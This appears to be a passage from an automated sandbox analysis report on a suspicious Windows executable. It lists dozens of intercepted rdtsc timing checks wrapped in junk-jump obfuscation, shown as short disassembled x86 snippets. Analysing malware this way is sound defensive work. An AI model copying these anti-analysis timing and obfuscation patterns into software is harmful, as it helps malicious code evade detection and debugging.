Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F4107B second address: 6F410CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, si 0x00000006 push eax 0x00000007 pop edi 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b lea eax, dword ptr [ebp-18h] 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FB6E8B0AEE4h 0x00000015 sbb si, 24A8h 0x0000001a jmp 00007FB6E8B0AEDBh 0x0000001f popfd 0x00000020 mov esi, 74C10F9Fh 0x00000025 popad 0x00000026 nop 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007FB6E8B0AEE1h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F410CA second address: 6F4111F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 3BA93B52h 0x00000008 jmp 00007FB6E8B0C7F3h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 jmp 00007FB6E8B0C7F9h 0x00000016 nop 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a jmp 00007FB6E8B0C7F3h 0x0000001f mov eax, 56198D3Fh 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F4116E second address: 6F411B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6E8B0AEDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edi, edi 0x0000000b jmp 00007FB6E8B0AEE6h 0x00000010 js 00007FB757E093F0h 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FB6E8B0AEE7h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F411B4 second address: 6F41266 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6E8B0C7F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp-14h] 0x0000000c jmp 00007FB6E8B0C7EEh 0x00000011 mov ecx, esi 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FB6E8B0C7EEh 0x0000001a xor cx, 6A08h 0x0000001f jmp 00007FB6E8B0C7EBh 0x00000024 popfd 0x00000025 mov edx, ecx 0x00000027 popad 0x00000028 mov dword ptr [esi+0Ch], eax 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007FB6E8B0C7F7h 0x00000032 add esi, 01A4CAFEh 0x00000038 jmp 00007FB6E8B0C7F9h 0x0000003d popfd 0x0000003e popad 0x0000003f mov edx, 762C06ECh 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 jmp 00007FB6E8B0C7F8h 0x0000004d rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F41266 second address: 6F4126C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F4126C second address: 6F41286 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6E8B0C7EEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub eax, eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e mov cx, bx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F41286 second address: 6F41290 instructions: 0x00000000 rdtsc 0x00000002 mov dh, F9h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 mov dh, cl 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F41290 second address: 6F412CA instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FB6E8B0C7EDh 0x00000008 jmp 00007FB6E8B0C7EBh 0x0000000d popfd 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 lock cmpxchg dword ptr [edx], ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FB6E8B0C7F5h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F412CA second address: 6F4134C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FB6E8B0AEE7h 0x00000008 pop ecx 0x00000009 pushfd 0x0000000a jmp 00007FB6E8B0AEE9h 0x0000000f jmp 00007FB6E8B0AEDBh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 pop edi 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c push edx 0x0000001d pop ecx 0x0000001e pushfd 0x0000001f jmp 00007FB6E8B0AEE7h 0x00000024 adc si, 909Eh 0x00000029 jmp 00007FB6E8B0AEE9h 0x0000002e popfd 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F4134C second address: 6F413AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FB6E8B0C7F7h 0x00000009 and si, 9AAEh 0x0000000e jmp 00007FB6E8B0C7F9h 0x00000013 popfd 0x00000014 push eax 0x00000015 pop edx 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 test eax, eax 0x0000001b jmp 00007FB6E8B0C7EAh 0x00000020 jne 00007FB757E0AB2Bh 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FB6E8B0C7EAh 0x0000002f rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F413AB second address: 6F413AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F413AF second address: 6F413B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F413B5 second address: 6F413EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6E8B0AEDEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [ebp+08h] 0x0000000c jmp 00007FB6E8B0AEE0h 0x00000011 mov eax, dword ptr [esi] 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FB6E8B0AEDAh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F413EA second address: 6F413EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F413EE second address: 6F413F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F413F4 second address: 6F41429 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, 77C88783h 0x00000008 movzx eax, bx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [edx], eax 0x00000010 jmp 00007FB6E8B0C7EBh 0x00000015 mov eax, dword ptr [esi+04h] 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FB6E8B0C7F5h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F41429 second address: 6F4145A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6E8B0AEE1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+04h], eax 0x0000000c pushad 0x0000000d jmp 00007FB6E8B0AEDCh 0x00000012 movzx esi, di 0x00000015 popad 0x00000016 mov eax, dword ptr [esi+08h] 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F4145A second address: 6F41473 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB6E8B0C7F4h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F41473 second address: 6F41478 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F41478 second address: 6F414B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+08h], eax 0x0000000c jmp 00007FB6E8B0C7F9h 0x00000011 mov eax, dword ptr [esi+0Ch] 0x00000014 pushad 0x00000015 mov ebx, ecx 0x00000017 mov cx, DF4Fh 0x0000001b popad 0x0000001c mov dword ptr [edx+0Ch], eax 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 mov edi, 5E91BB12h 0x00000027 mov cx, bx 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F414B7 second address: 6F414F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dh, al 0x00000005 mov ebx, 5B3B0CC2h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [esi+10h] 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007FB6E8B0AEE2h 0x00000019 jmp 00007FB6E8B0AEE5h 0x0000001e popfd 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F414F5 second address: 6F414FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F414FA second address: 6F41500 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F41500 second address: 6F41504 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F41504 second address: 6F41535 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6E8B0AEE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [edx+10h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FB6E8B0AEDDh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F41535 second address: 6F4153B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F4153B second address: 6F4153F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F4153F second address: 6F41563 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+14h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e call 00007FB6E8B0C7F0h 0x00000013 pop eax 0x00000014 mov dx, 58B6h 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F41563 second address: 6F4158F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6E8B0AEDCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+14h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB6E8B0AEE7h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F4158F second address: 6F41595 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F41595 second address: 6F41599 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F41599 second address: 6F4159D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F4159D second address: 6F415C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+18h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007FB6E8B0AEE6h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F415C4 second address: 6F41614 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FB6E8B0C7F1h 0x00000009 or eax, 5FCC1CD6h 0x0000000f jmp 00007FB6E8B0C7F1h 0x00000014 popfd 0x00000015 mov edi, esi 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov dword ptr [edx+18h], eax 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FB6E8B0C7F9h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F41614 second address: 6F4161A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F4161A second address: 6F416A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+1Ch] 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FB6E8B0C7F5h 0x00000012 adc ecx, 1C2F0A46h 0x00000018 jmp 00007FB6E8B0C7F1h 0x0000001d popfd 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007FB6E8B0C7EEh 0x00000025 sub esi, 26306EE8h 0x0000002b jmp 00007FB6E8B0C7EBh 0x00000030 popfd 0x00000031 mov ecx, 20DC36DFh 0x00000036 popad 0x00000037 popad 0x00000038 mov dword ptr [edx+1Ch], eax 0x0000003b pushad 0x0000003c mov bl, ch 0x0000003e mov ecx, ebx 0x00000040 popad 0x00000041 mov eax, dword ptr [esi+20h] 0x00000044 jmp 00007FB6E8B0C7EFh 0x00000049 mov dword ptr [edx+20h], eax 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f push edx 0x00000050 pushad 0x00000051 popad 0x00000052 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F416A1 second address: 6F416A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F416A5 second address: 6F416AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F416AB second address: 6F416B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F416B1 second address: 6F416B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F416B5 second address: 6F4174D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+24h] 0x0000000b jmp 00007FB6E8B0AEE0h 0x00000010 mov dword ptr [edx+24h], eax 0x00000013 pushad 0x00000014 mov cx, 586Dh 0x00000018 jmp 00007FB6E8B0AEDAh 0x0000001d popad 0x0000001e mov eax, dword ptr [esi+28h] 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007FB6E8B0AEDEh 0x00000028 and si, B138h 0x0000002d jmp 00007FB6E8B0AEDBh 0x00000032 popfd 0x00000033 pushfd 0x00000034 jmp 00007FB6E8B0AEE8h 0x00000039 adc ecx, 2D272B98h 0x0000003f jmp 00007FB6E8B0AEDBh 0x00000044 popfd 0x00000045 popad 0x00000046 mov dword ptr [edx+28h], eax 0x00000049 push eax 0x0000004a push edx 0x0000004b jmp 00007FB6E8B0AEE5h 0x00000050 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F4174D second address: 6F4175D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB6E8B0C7ECh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F4175D second address: 6F417BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, dword ptr [esi+2Ch] 0x0000000b pushad 0x0000000c mov bl, 79h 0x0000000e call 00007FB6E8B0AEE6h 0x00000013 jmp 00007FB6E8B0AEE2h 0x00000018 pop esi 0x00000019 popad 0x0000001a mov dword ptr [edx+2Ch], ecx 0x0000001d jmp 00007FB6E8B0AEE1h 0x00000022 mov ax, word ptr [esi+30h] 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007FB6E8B0AEDDh 0x0000002d rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F417BC second address: 6F4187C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6E8B0C7F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov word ptr [edx+30h], ax 0x0000000d jmp 00007FB6E8B0C7EEh 0x00000012 mov ax, word ptr [esi+32h] 0x00000016 pushad 0x00000017 call 00007FB6E8B0C7EEh 0x0000001c movzx ecx, bx 0x0000001f pop edi 0x00000020 mov si, 4C43h 0x00000024 popad 0x00000025 mov word ptr [edx+32h], ax 0x00000029 jmp 00007FB6E8B0C7F6h 0x0000002e mov eax, dword ptr [esi+34h] 0x00000031 jmp 00007FB6E8B0C7F0h 0x00000036 mov dword ptr [edx+34h], eax 0x00000039 pushad 0x0000003a mov cx, 184Dh 0x0000003e pushfd 0x0000003f jmp 00007FB6E8B0C7EAh 0x00000044 adc eax, 184AAB68h 0x0000004a jmp 00007FB6E8B0C7EBh 0x0000004f popfd 0x00000050 popad 0x00000051 test ecx, 00000700h 0x00000057 jmp 00007FB6E8B0C7F6h 0x0000005c jne 00007FB757E0A68Fh 0x00000062 pushad 0x00000063 mov al, 4Fh 0x00000065 push eax 0x00000066 push edx 0x00000067 mov ax, di 0x0000006a rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F90CB3 second address: 6F90CB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F90CB7 second address: 6F90CBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F90CBD second address: 6F90D59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FB6E8B0AEDCh 0x00000009 xor al, FFFFFF98h 0x0000000c jmp 00007FB6E8B0AEDBh 0x00000011 popfd 0x00000012 mov dx, ax 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 pushad 0x0000001a call 00007FB6E8B0AEDBh 0x0000001f pushad 0x00000020 popad 0x00000021 pop eax 0x00000022 popad 0x00000023 xchg eax, ebp 0x00000024 pushad 0x00000025 pushfd 0x00000026 jmp 00007FB6E8B0AEDEh 0x0000002b adc cx, FB28h 0x00000030 jmp 00007FB6E8B0AEDBh 0x00000035 popfd 0x00000036 pushfd 0x00000037 jmp 00007FB6E8B0AEE8h 0x0000003c add si, 2D88h 0x00000041 jmp 00007FB6E8B0AEDBh 0x00000046 popfd 0x00000047 popad 0x00000048 mov ebp, esp 0x0000004a push eax 0x0000004b push edx 0x0000004c jmp 00007FB6E8B0AEE5h 0x00000051 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F90D59 second address: 6F90D5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F90D5F second address: 6F90D63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F90D63 second address: 6F90D67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F30799 second address: 6F3081E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6E8B0AEE1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov eax, 268590D3h 0x00000010 pushfd 0x00000011 jmp 00007FB6E8B0AEE8h 0x00000016 xor al, 00000058h 0x00000019 jmp 00007FB6E8B0AEDBh 0x0000001e popfd 0x0000001f popad 0x00000020 push eax 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007FB6E8B0AEDFh 0x00000028 and ch, 0000001Eh 0x0000002b jmp 00007FB6E8B0AEE9h 0x00000030 popfd 0x00000031 pushad 0x00000032 mov cx, E33Dh 0x00000036 movzx esi, bx 0x00000039 popad 0x0000003a popad 0x0000003b xchg eax, ebp 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 popad 0x00000042 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F3081E second address: 6F30822 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F30822 second address: 6F30828 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F30828 second address: 6F30851 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6E8B0C7F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c mov ecx, 009BC053h 0x00000011 push eax 0x00000012 push edx 0x00000013 push ecx 0x00000014 pop ebx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6ED0030 second address: 6ED0036 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6ED0036 second address: 6ED003A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6ED0724 second address: 6ED0732 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB6E8B0AEDAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6ED0732 second address: 6ED0742 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6ED0742 second address: 6ED0747 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6ED0747 second address: 6ED078B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB6E8B0C7F0h 0x00000008 pushfd 0x00000009 jmp 00007FB6E8B0C7F2h 0x0000000e sbb al, 00000028h 0x00000011 jmp 00007FB6E8B0C7EBh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebp 0x0000001b pushad 0x0000001c mov edx, eax 0x0000001e popad 0x0000001f mov ebp, esp 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 mov bh, C3h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6ED078B second address: 6ED079B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dh, ch 0x00000008 popad 0x00000009 pop ebp 0x0000000a pushad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6ED0BB4 second address: 6ED0BBA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6ED0BBA second address: 6ED0BD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB6E8B0AEE3h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F20A0D second address: 6F20A15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dx, cx 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F20A15 second address: 6F20A40 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6E8B0AEDFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB6E8B0AEE5h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6EF0C1A second address: 6EF0C1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
